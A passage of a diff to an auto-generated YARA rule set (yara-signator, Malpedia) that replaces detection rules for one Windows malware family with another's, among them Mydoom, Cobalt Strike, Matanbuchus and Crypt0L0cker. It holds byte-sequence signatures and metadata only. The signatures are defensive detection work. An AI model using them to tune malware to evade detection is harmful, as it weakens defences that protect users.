"https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snojan_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matryoshka_rat_auto.yar#L1-L141" license_url = "N/A" - logic_hash = "a7da77f2b75075e9b17ce3132c822da8d2432067b99e241b1e6927c5f09a8d94" + logic_hash = "e63bf906be3841d18c1769641826f4871bcf6c179928d9c22e19c757766e13e1" score = 75 quality = 75 tags = "FILE" @@ -179251,32 +182070,36 @@ rule MALPEDIA_Win_Snojan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 83ec0c 83f8ff 0f8487010000 89c7 b802000000 c70424???????? } - $sequence_1 = { b802000000 c70424???????? 6689442420 ff15???????? 83ec04 c70424???????? 89442424 } - $sequence_2 = { 8d5c2430 c644241f00 c744240c00000000 c744240800900100 895c2404 893c24 ff15???????? } - $sequence_3 = { a1???????? 8b988000986d 85db 74da } - $sequence_4 = { 8d860000986d 8955cc e8???????? 8b45cc } - $sequence_5 = { 893c24 ff15???????? 83ec10 83f800 } - $sequence_6 = { e9???????? 0fb7810000986d 894dc0 89c7 81cf0000ffff 6683b90000986d00 0f48c7 } - $sequence_7 = { 85c0 74e9 a1???????? 8b988000986d 85db 74da 895c2404 } - $sequence_8 = { 837c243401 753d c744241400000000 c744241000000000 } - $sequence_9 = { 85c0 b801000000 0f44d0 8854241f 8974240c 896c2408 } + $sequence_0 = { b037 c3 b073 c3 } + $sequence_1 = { c3 b06f c3 b063 c3 } + $sequence_2 = { 8b46fc 8947fc 49 75ed 5f ff4210 } + $sequence_3 = { 8b4704 ff4710 ff07 8b0488 } + $sequence_4 = { 74e3 440fb603 430fbe841040d30500 85c0 } + $sequence_5 = { 8b4708 3b470c 7507 8bcf } + $sequence_6 = { 74e2 ff8170040000 83b97004000002 0f8493010000 83cfff 488d2d572c0300 } + $sequence_7 = { 74e9 488d15b9450400 488bcb e8???????? } + $sequence_8 = { 74de 83cbff 488bca e8???????? 90 48897c2420 } + $sequence_9 = { 8b4708 b120 8b570c 8b7718 } + $sequence_10 = { 74e6 488d152fac0300 488bcb e8???????? } + $sequence_11 = { 8b4704 8b3491 890491 8bd6 } + $sequence_12 = { 74e2 ff8170040000 83b97004000002 0f84eb010000 83cfff 4c8d3dde290300 } + $sequence_13 = { 8b4704 8bf1 33d1 81e6ff030000 } condition: - 7 of them and filesize <90112 + 7 of them and filesize <843776 } -rule MALPEDIA_Win_Anchormtea_Auto : FILE +rule MALPEDIA_Win_Mydoom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1f1be8a6-a512-5951-b4a5-8a59e9561b7d" + id = "fbb873d9-471c-5df6-b7cb-17b11908448b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchormtea" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.anchormtea_auto.yar#L1-L156" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydoom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mydoom_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "36b7e20db6ab94edc928176040f9980c01a0a26295c603a430e96744ecfde5c2" + logic_hash = "29814c8a4a60df1d6a473af327bca4071707640dfe79f325f53607e3865352f9" score = 75 quality = 75 tags = "FILE" @@ -179290,37 +182113,32 @@ rule MALPEDIA_Win_Anchormtea_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? f7d8 1bc0 83e002 } - $sequence_1 = { 33c0 6689047e eb14 51 } - $sequence_2 = { 83f81f 0f87f3080000 52 51 e8???????? } - $sequence_3 = { 7409 488bcf ff15???????? 33f6 4c8b7c2448 4c8b642460 } - $sequence_4 = { 488905???????? 488d055b7e0200 488905???????? 488d05897d0200 48890d???????? 48890d???????? } - $sequence_5 = { 899d1cffffff ffd7 50 ffd6 } - $sequence_6 = { 8b9580f7ffff 89856cf7ffff 8b85acf7ffff 2bc7 898d5cf7ffff 89bd64f7ffff } - $sequence_7 = { 4983ff10 4c0f43f7 4c8b6c2470 4983fd0b 725f 4f8d242e } - $sequence_8 = { 51 57 8d4dd8 e8???????? 33d2 895588 90 } - $sequence_9 = { 4883c0f8 4883f81f 772e e8???????? 8bc6 } - $sequence_10 = { 488d9510020000 488bcb ff15???????? 413b7624 } - $sequence_11 = { 4a8d3c39 488bc6 482bc2 4869d88c090000 } - $sequence_12 = { 33ff 488945d0 488d45e0 4533c9 4889442448 4533c0 } - $sequence_13 = { 740e 6a40 68???????? 68???????? ffd7 8d45f8 } - $sequence_14 = { 7514 3b8598fdffff 1bc0 238598fdffff } + $sequence_0 = { 0f94c2 83f842 0f94c0 09d0 ba00000000 a801 0f8531010000 } + $sequence_1 = { 49 c744241000000000 8d85c4fdffff 8944240c 894c2408 } + $sequence_2 = { 891c24 e8???????? 85c0 743c 8b85d8feffff 89442404 891c24 } + $sequence_3 = { 891c24 e8???????? 83ec04 c744240402000000 } + $sequence_4 = { 85c0 89c3 7413 89f6 8dbc2700000000 ff149df8354200 } + $sequence_5 = { 8d9dc8f9ffff 891c24 e8???????? 8d8568f9ffff 89442424 89742420 } + $sequence_6 = { 83ec58 895df4 8975f8 897dfc 8b7510 0fb74514 668945e6 } + $sequence_7 = { 89e5 56 53 83ec10 8b750c 83fe01 } + $sequence_8 = { 890424 e8???????? e8???????? 8db406fc2f0000 0fb745e6 } + $sequence_9 = { 85d0 7547 85f6 750c 8b0d???????? 85c9 7546 } condition: - 7 of them and filesize <839680 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Pandabanker_Auto : FILE +rule MALPEDIA_Win_Catb_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "58cad36d-92dc-5f57-8115-b38a95b1c2cd" + id = "515d6ff4-29b8-5f9d-8e4d-ae72db2e24b8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pandabanker_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.catb_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "64182a4cfed301300c0a7df71a34e50b114a69353e8eb5e84fdb9f4804c83f2c" + logic_hash = "9a8c29b856252443b361ebb50acc406bc1908e5c4eee2fd3c5627837db3c96fd" score = 75 quality = 75 tags = "FILE" @@ -179334,32 +182152,32 @@ rule MALPEDIA_Win_Pandabanker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 8bf2 57 83f8ff 7507 8bce e8???????? } - $sequence_1 = { 57 8b4808 8d7c2418 8b4004 } - $sequence_2 = { c1e202 8bfe 8bca 45 } - $sequence_3 = { 7404 c6400109 8b442430 8bd5 014608 8bcf 56 } - $sequence_4 = { eb2c 6a05 5a 8bcf } - $sequence_5 = { c6007b 40 85db 7404 c6000a 40 c60000 } - $sequence_6 = { e8???????? 8bf0 85f6 7411 8bcf } - $sequence_7 = { 85ff 7423 8b0e 8bd5 } - $sequence_8 = { e8???????? 8b742414 8bce 8b542418 89742424 e8???????? 84c0 } - $sequence_9 = { 7508 33c0 85d2 0f95c0 c3 } + $sequence_0 = { 418bcc e8???????? 85c0 0f8484000000 488b442440 488d0d22920300 } + $sequence_1 = { 4c8d050e9c0300 83e23f 488bcb 48c1f906 488d14d2 498b0cc8 8064d138fd } + $sequence_2 = { 488d159bdc0000 483950f0 740b 488b10 } + $sequence_3 = { 4c8d0da47f0000 b903000000 4c8d05907f0000 488d15f9750000 e8???????? 4885c0 740f } + $sequence_4 = { 4533c0 488d0d8e0e0400 baa00f0000 e8???????? 85c0 740a ff05???????? } + $sequence_5 = { 4c8d0d6bab0300 4c8bc6 488bd7 488bcb e8???????? } + $sequence_6 = { 4c8d0d922affff 4c8b4570 8b5568 488b4d60 } + $sequence_7 = { 4053 4883ec20 8bd9 4c8d0d05d00000 } + $sequence_8 = { 488d0d72190400 e8???????? 488b442438 488905???????? 488d442438 4883c008 } + $sequence_9 = { 488bc3 498784f6803c0400 4885c0 7409 } condition: - 7 of them and filesize <417792 + 7 of them and filesize <593920 } -rule MALPEDIA_Win_Action_Rat_Auto : FILE +rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b171bb40-9b64-5f84-b8a8-e9db33470a7a" + id = "3ca18c92-db73-54b4-928d-eb72333dfc4b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.action_rat_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crypt0l0cker_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "d6b5f7381b8e2ad2725999fb927500f671ba77c3542ba9198900375907d98a2d" + logic_hash = "3ce866cbdb58e590ea553be6664221b117cb83d9a5d4d70643f018e4fb580d20" score = 75 quality = 75 tags = "FILE" @@ -179373,32 +182191,32 @@ rule MALPEDIA_Win_Action_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4d0c e8???????? 8b4508 8b4df4 64890d00000000 59 5b } - $sequence_1 = { 8b55f8 52 8b4dfc 83c134 e8???????? 8b00 50 } - $sequence_2 = { 83c270 52 8b4dfc 83c170 } - $sequence_3 = { e8???????? c745d400000000 eb09 8b4dd4 83c101 894dd4 8d4d0c } - $sequence_4 = { 7420 0fb645fb 50 8b4df4 8b4918 e8???????? 0fb6d0 } - $sequence_5 = { 0fb74202 50 ff15???????? 0fb7c8 8b5514 890a } - $sequence_6 = { 6a00 8b45fc 50 8b4d08 51 e8???????? 83c418 } - $sequence_7 = { e8???????? 8d8ddcfbffff e8???????? c645fc0e 6a00 68e0930400 6a00 } - $sequence_8 = { 0de0000000 b901000000 6bd100 8b4d0c 880411 8b5508 c1fa06 } - $sequence_9 = { 8b4df4 3b4df8 750b 68???????? ff15???????? 8b55ec 833a22 } + $sequence_0 = { 85c0 0f8486000000 53 8d58ff c1eb02 56 } + $sequence_1 = { 8b4640 85c0 0f8479000000 83780c00 7473 6800010000 e8???????? } + $sequence_2 = { 85f6 0f8ead000000 8d4108 8d04b8 894508 8b4510 83c008 } + $sequence_3 = { 55 56 8d44240f 8bea 50 6a01 ff35???????? } + $sequence_4 = { 83c40c 33c0 6689043b 897e08 85ff 0f84d6000000 } + $sequence_5 = { 8b4c243c 8b442430 8911 894104 eb17 8bcf e8???????? } + $sequence_6 = { b9???????? 3d90010000 0f4cce 8bf1 8b7f04 85f6 74c9 } + $sequence_7 = { 8bce e8???????? 8bf8 83c408 85ff 7438 83c705 } + $sequence_8 = { 68???????? 6a05 6840b6b9a6 6a1c e8???????? 83c424 } + $sequence_9 = { 0f8581020000 807dee81 0f8577020000 ff75ef ff15???????? 8b0f 8bd3 } condition: - 7 of them and filesize <480256 + 7 of them and filesize <917504 } -rule MALPEDIA_Win_Moure_Auto : FILE +rule MALPEDIA_Win_Matanbuchus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d5ea53f7-d6a1-5284-9152-98034607f388" + id = "2788ba99-d4a7-56bc-b166-5140402f53be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moure_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matanbuchus_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "e394b210e6ac1eaa6569608ddb349d4dd1ae50231f20d0924074c460f1fa6782" + logic_hash = "78ecf15a99d40895d657b9372a7af5a206c5b9d4887dbdf8360368c6bcd36a27" score = 75 quality = 75 tags = "FILE" @@ -179412,32 +182230,32 @@ rule MALPEDIA_Win_Moure_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e } - $sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 } - $sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 } - $sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 } - $sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 } - $sequence_5 = { 82a8a200b000c1 8b00 e100 9e d28bd3977e8d 98 } - $sequence_6 = { 68b0704000 007014 007010 e8???????? } - $sequence_7 = { 5e 53 43 c1c361 5b c9 51 } - $sequence_8 = { 8b01 83e03f 3c02 751c 8b4514 8b10 83e23f } - $sequence_9 = { 42 c3 874226 c58035b4fe70 5e } + $sequence_0 = { 038c0534fdffff 51 e8???????? ebb4 8b55fc 52 e8???????? } + $sequence_1 = { 6a0c 6a0c 68???????? e8???????? } + $sequence_2 = { 8b4dfc 038c0534fdffff 51 e8???????? } + $sequence_3 = { 8b4df8 8b513c 035508 8955f4 } + $sequence_4 = { 6bc200 8b4d08 0fbe1401 33550c } + $sequence_5 = { 68f8000000 8d95b8feffff 52 8b45fc 0345ec 50 e8???????? } + $sequence_6 = { 8b45f4 c1e818 3345f4 8945f4 694df495e9d15b 894df4 } + $sequence_7 = { 51 8b55f0 52 6b45f828 8b4dfc 038c0534fdffff } + $sequence_8 = { eb44 b901000000 d1e1 8b55ec } + $sequence_9 = { 8b55ec 813a50450000 7407 33c0 e9???????? } condition: - 7 of them and filesize <188416 + 7 of them and filesize <2056192 } -rule MALPEDIA_Win_Wonknu_Auto : FILE +rule MALPEDIA_Win_Mmon_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ddaff543-6be8-5c88-9c2c-3d8f03caff26" + id = "684efad9-d1d6-5ce6-b6e0-de65ea38db79" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wonknu_auto.yar#L1-L111" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mmon_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "97458316dc025f2ef3806add4e0540e6bc317fe3a272c04393704aa62f6ae30d" + logic_hash = "fc9a1ffbaa9f24fc3223df86b9f3747f68822a1333ac4081d18094cd5050cf44" score = 75 quality = 75 tags = "FILE" @@ -179451,32 +182269,32 @@ rule MALPEDIA_Win_Wonknu_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bfc b901050000 f3a5 8bcb } - $sequence_1 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? } - $sequence_2 = { b901050000 f3a5 8bcb e8???????? 803b00 } - $sequence_3 = { 6a04 50 ff15???????? 68???????? } - $sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 } - $sequence_5 = { e8???????? 8bfc b901050000 f3a5 } - $sequence_6 = { eb08 c6840550ffffff00 8d8550ffffff 50 } - $sequence_7 = { 53 56 57 6804140000 } - $sequence_8 = { c6840550ffffff00 8d8550ffffff 50 e8???????? } - $sequence_9 = { 8d7e28 57 ff15???????? 8b4608 } + $sequence_0 = { 8d04f5c8474200 8938 68a00f0000 ff30 } + $sequence_1 = { 8d45cc 50 c745ccc8e64100 e8???????? 8b7508 } + $sequence_2 = { 3c58 770f 0fbec2 0fb68020094200 } + $sequence_3 = { 6aff 53 6a00 6a00 8bf1 } + $sequence_4 = { 891d???????? ff15???????? 85c0 7577 8b15???????? } + $sequence_5 = { 40 0080af4000a4 af 40 } + $sequence_6 = { 8b44241c 83c404 50 ff15???????? 6880969800 e8???????? } + $sequence_7 = { 03f9 8bda 83feff 7fa7 b867666666 f7ef c1fa02 } + $sequence_8 = { eb0a c7854cffffff00000000 b802000000 018554ffffff 018548ffffff 03f8 } + $sequence_9 = { 64a300000000 8b7d0c 8b07 68???????? 51 50 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <356352 } -rule MALPEDIA_Win_Void_Auto : FILE +rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "71ce776b-404f-5334-912d-5acada68aa35" + id = "fe16365e-18f7-5cb3-91e7-4778fbcc5b82" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.void_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cobalt_strike_auto.yar#L1-L157" license_url = "N/A" - logic_hash = "c9d396773d78302d4ad6bf52fbcd07db1d946f6b7dffcc9d3a1efd465ff43099" + logic_hash = "e575d34f1fe7007aa1601e291288f1136cef68df0b3f455e03eabc3d825e94fe" score = 75 quality = 75 tags = "FILE" @@ -179490,30 +182308,38 @@ rule MALPEDIA_Win_Void_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a09 8d4c2410 51 50 e8???????? 85c0 7518 } - $sequence_1 = { 5d c20c00 6a00 ff750c 50 e8???????? 50 } - $sequence_2 = { 807d6b00 0f8483000000 6a02 8d4dc4 e8???????? 8d45c4 c745fc02000000 } - $sequence_3 = { 0f43c6 50 ff7514 8d45ac ff7510 50 53 } - $sequence_4 = { 5b 8bc1 8b4c2440 5e 5d 33cc e8???????? } - $sequence_5 = { 7473 8d4dec 8975ec e8???????? 53 8bcf 8b00 } - $sequence_6 = { 854110 7419 8d45e4 6a01 50 e8???????? 83c408 } - $sequence_7 = { 894610 c1e102 51 8d0490 6a00 50 e8???????? } + $sequence_0 = { 3bc7 750d ff15???????? 3d33270000 } + $sequence_1 = { e9???????? eb0a b801000000 e9???????? } + $sequence_2 = { eb06 0fb6c0 83e07f 85c0 745a } + $sequence_3 = { eb68 8b45d4 8b482c 894de0 8b45e0 } + $sequence_4 = { ff35???????? ffd6 5e e9???????? 55 } + $sequence_5 = { eb4e 83f824 7f09 c745f403000000 } + $sequence_6 = { ff761c 83c004 e8???????? 59 59 83f8ff } + $sequence_7 = { f3a6 744c 8bf0 6a03 bf???????? 59 } + $sequence_8 = { 85c0 741d ff15???????? 85c0 7513 } + $sequence_9 = { e9???????? 833d????????01 7505 e8???????? } + $sequence_10 = { 8bd0 e8???????? 85c0 7e0e } + $sequence_11 = { 85c0 7405 e8???????? 8b0d???????? 85c9 } + $sequence_12 = { f3c3 cc 488bc4 48895808 48896810 48897018 } + $sequence_13 = { c1e903 ffc1 03c1 3d80000000 } + $sequence_14 = { 49ffc7 413bcc 72e9 41894d00 } + $sequence_15 = { 48895c2448 48895c2440 4889442438 498b06 } condition: - 7 of them and filesize <2744320 + 7 of them and filesize <1015808 } -rule MALPEDIA_Win_Obscene_Auto : FILE +rule MALPEDIA_Win_Moonbounce_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b0504e00-5509-5e10-82c6-a688a7937d0f" + id = "c186ffa8-3b28-566b-9f82-5819628ca523" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.obscene" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.obscene_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonbounce" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.moonbounce_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "62960aba55b9b132d0d487c37c4dacdc8a915363f3251233103a943c3f791f18" + logic_hash = "081fa4bc70b28c3a98dc6caeb9104489e42b513d1d76e6dfbd571155c86ff551" score = 75 quality = 75 tags = "FILE" @@ -179527,34 +182353,34 @@ rule MALPEDIA_Win_Obscene_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a06 68fc421010 ff35???????? 6aff ff15???????? ff7520 } - $sequence_1 = { 68e4401010 e8???????? 59 80a0e240101000 68e4401010 e8???????? 59 } - $sequence_2 = { 59 6820431010 68e4401010 e8???????? 59 59 85c0 } - $sequence_3 = { 0fbe00 83f809 7416 8b45fc 0fbe00 83f80d } - $sequence_4 = { 59 80a012109a0000 68???????? e8???????? } - $sequence_5 = { 50 e8???????? 59 68???????? 8d85ecf6ffff 50 } - $sequence_6 = { 8bec b8400d0300 e8???????? 68360d0300 ff7508 } - $sequence_7 = { 59 59 68c4501010 68d83f1010 6814110010 e8???????? } - $sequence_8 = { 0fbe00 83f82d 7409 8b45f8 40 8945f8 eb08 } - $sequence_9 = { 8365fc00 6a40 ff7508 ff15???????? 59 59 } + $sequence_0 = { 7413 8d041e 85c0 0f8407feffff ff7704 6a01 } + $sequence_1 = { 3bfe 7426 56 56 56 56 } + $sequence_2 = { 6a04 6800200000 ff7650 50 ff5708 8bd8 85db } + $sequence_3 = { 8b5de8 5e 5f 8bc3 5b } + $sequence_4 = { 833800 7413 8345fc04 8b45fc 8b00 } + $sequence_5 = { 56 57 6a30 33ff 57 ff15???????? } + $sequence_6 = { a3???????? 3935???????? 7441 3935???????? } + $sequence_7 = { 8d45e8 50 ffd7 84c0 0f8482000000 } + $sequence_8 = { 8b400c 85c0 0f8495000000 03c3 50 ff570c } + $sequence_9 = { 3bfe 7426 56 56 56 56 68???????? } condition: - 7 of them and filesize <2170880 + 7 of them and filesize <70912 } -rule MALPEDIA_Win_Bankshot_Auto : FILE +rule MALPEDIA_Win_Simda_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4fd3740f-7572-57c0-9152-6fcb3e7bee0c" + id = "be795d70-d5c5-5e96-885a-c6d393925d47" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bankshot_auto.yar#L1-L425" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.simda_auto.yar#L1-L114" license_url = "N/A" - logic_hash = "c9fc73e4e08c210def43b3c6eab22aa7333e3e000dbbe6d6d67c9182f6534613" + logic_hash = "3de0f7a52fa615dd54916d8a958f210fe06f4ad101457fb659a131786ec59f6f" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -179566,67 +182392,32 @@ rule MALPEDIA_Win_Bankshot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 } - $sequence_1 = { 8bec 81ec48040000 a1???????? 33c5 8945f8 53 } - $sequence_2 = { e9???????? 57 33ff 8bcf 8bc7 894de4 3998c0e10110 } - $sequence_3 = { c74048b8e40110 8b4508 6689486c 8b4508 66898872010000 8b4508 83a04c03000000 } - $sequence_4 = { 33c9 33d2 66898c45f47fffff 8d8df47fffff 8d7102 668b01 83c102 } - $sequence_5 = { 89855c38ffff fec1 888d6438ffff 85fa 0f84a4000000 } - $sequence_6 = { 8b45fc 817848b8e40110 7409 ff7048 e8???????? } - $sequence_7 = { 0f84a6000000 680c400000 8d85e4bfffff 53 50 } - $sequence_8 = { 680c000200 e8???????? 8bf8 83c404 85ff 0f8429060000 6915????????04010000 } - $sequence_9 = { 83c40c 8d85bcbaffff 33f6 6828050000 56 50 } - $sequence_10 = { e8???????? 83c40c e8???????? 99 b907000000 } - $sequence_11 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 } - $sequence_12 = { 0f1f4000 80b40d943dffffaa 41 3bca 7cf3 } - $sequence_13 = { c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 } - $sequence_14 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 } - $sequence_15 = { 8b542420 8987d0000000 8b442424 898fd4000000 8917 } - $sequence_16 = { e8???????? 488d0de7030000 e8???????? 33c0 4883c420 } - $sequence_17 = { 488d0d1e960000 c705????????30000000 8bd8 c705????????02000000 48c705????????07000000 48893d???????? } - $sequence_18 = { 8b0c95c8887100 8844192e 8b0495c8887100 804c182d04 ff4604 eb08 } - $sequence_19 = { 51 ff15???????? 8bf0 83feff 89742410 7544 ff15???????? } - $sequence_20 = { ff15???????? 68???????? 57 8985bcfbffff } - $sequence_21 = { 48c744243002000080 e8???????? 488d8c2440020000 33d2 } - $sequence_22 = { 52 8d85c4fbffff 50 ff15???????? 8d8dd0fdffff } - $sequence_23 = { 57 83e502 4d ff15???????? 85f6 7407 } - $sequence_24 = { 8d1c85b4ef0110 33c0 f00fb10b 8b15???????? 83cfff 8bca } - $sequence_25 = { 7508 8b36 85f6 75e7 eb3a 81c694010000 } - $sequence_26 = { e9???????? 8d8df0feffff 51 8d95e8feffff } - $sequence_27 = { ff15???????? 8b8df8f3ffff c7410800000000 8b95f8f3ffff 837a0400 } - $sequence_28 = { 8dbc24de040000 668974245c f3ab 66ab } - $sequence_29 = { 85c9 0f85b5010000 488d8c2450030000 e8???????? e9???????? 498d4906 } - $sequence_30 = { ff15???????? 41b958000000 488d1558530000 458d41d6 } - $sequence_31 = { 8895affbffff 8b859cfbffff 8a8daffbffff 8808 8b9588fbffff } - $sequence_32 = { 8b15???????? 6a01 8d4c2414 6a04 51 8944241c } - $sequence_33 = { c1f906 6bc030 03048d80f10110 50 ff15???????? 5d } - $sequence_34 = { 33cc e8???????? 8be5 5d c20400 8b8c241c3c0000 83c8ff } - $sequence_35 = { 7531 e8???????? 8904bdc87f0110 85c0 7514 } - $sequence_36 = { 6a03 6a00 6a03 8d8424c0040000 68000000c0 50 ff15???????? } - $sequence_37 = { 33d2 488bc8 4889742448 ff15???????? 896c2460 8bdd } - $sequence_38 = { 488d9560040000 41b800400000 488bce 89442460 89442468 4889442420 ff15???????? } - $sequence_39 = { e8???????? 83c404 eb36 8d530c } - $sequence_40 = { 8d7201 8a0a 42 84c9 75f9 6a00 } - $sequence_41 = { 8815???????? 488d442438 488d353a490000 41b919000200 4533c0 48c7c102000080 } - $sequence_42 = { 6bd030 895de4 8b049dc87f0110 8945d4 8955e8 8a5c1029 80fb02 } - $sequence_43 = { 8b8544d4ffff 83c001 6689856cd4ffff 8a4d1c } - $sequence_44 = { 51 68???????? 8b4dfc e8???????? b801000000 8be5 } + $sequence_0 = { 50 c745fc04010000 a4 e8???????? } + $sequence_1 = { 3bce 8945f4 1bc0 40 57 895dfc } + $sequence_2 = { c7049f00000000 75f6 8b0f 894d08 } + $sequence_3 = { 760d 8b7d08 83c704 8d4eff 33c0 } + $sequence_4 = { c1e110 0b4df4 03d6 83ceff 2bca } + $sequence_5 = { 8b0d???????? 8945d4 a1???????? 8955dc 0fb615???????? } + $sequence_6 = { c1eb10 3bce 7601 4b c1ef10 } + $sequence_7 = { 83c408 85c0 74e4 6a0a 6a00 56 c60000 } + $sequence_8 = { 8bd1 c1ea10 8955ec 8bf8 } + $sequence_9 = { 41 eb08 83c102 eb03 83c103 } condition: - 7 of them and filesize <860160 + 7 of them and filesize <1581056 } -rule MALPEDIA_Win_Sobig_Auto : FILE +rule MALPEDIA_Win_Threebyte_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7eece2fa-1a04-5dd6-834d-8f7a893bf841" + id = "ce3faee0-35b6-5807-9d64-6a9a343be0ab" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sobig_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.threebyte_auto.yar#L1-L127" license_url = "N/A" - logic_hash = 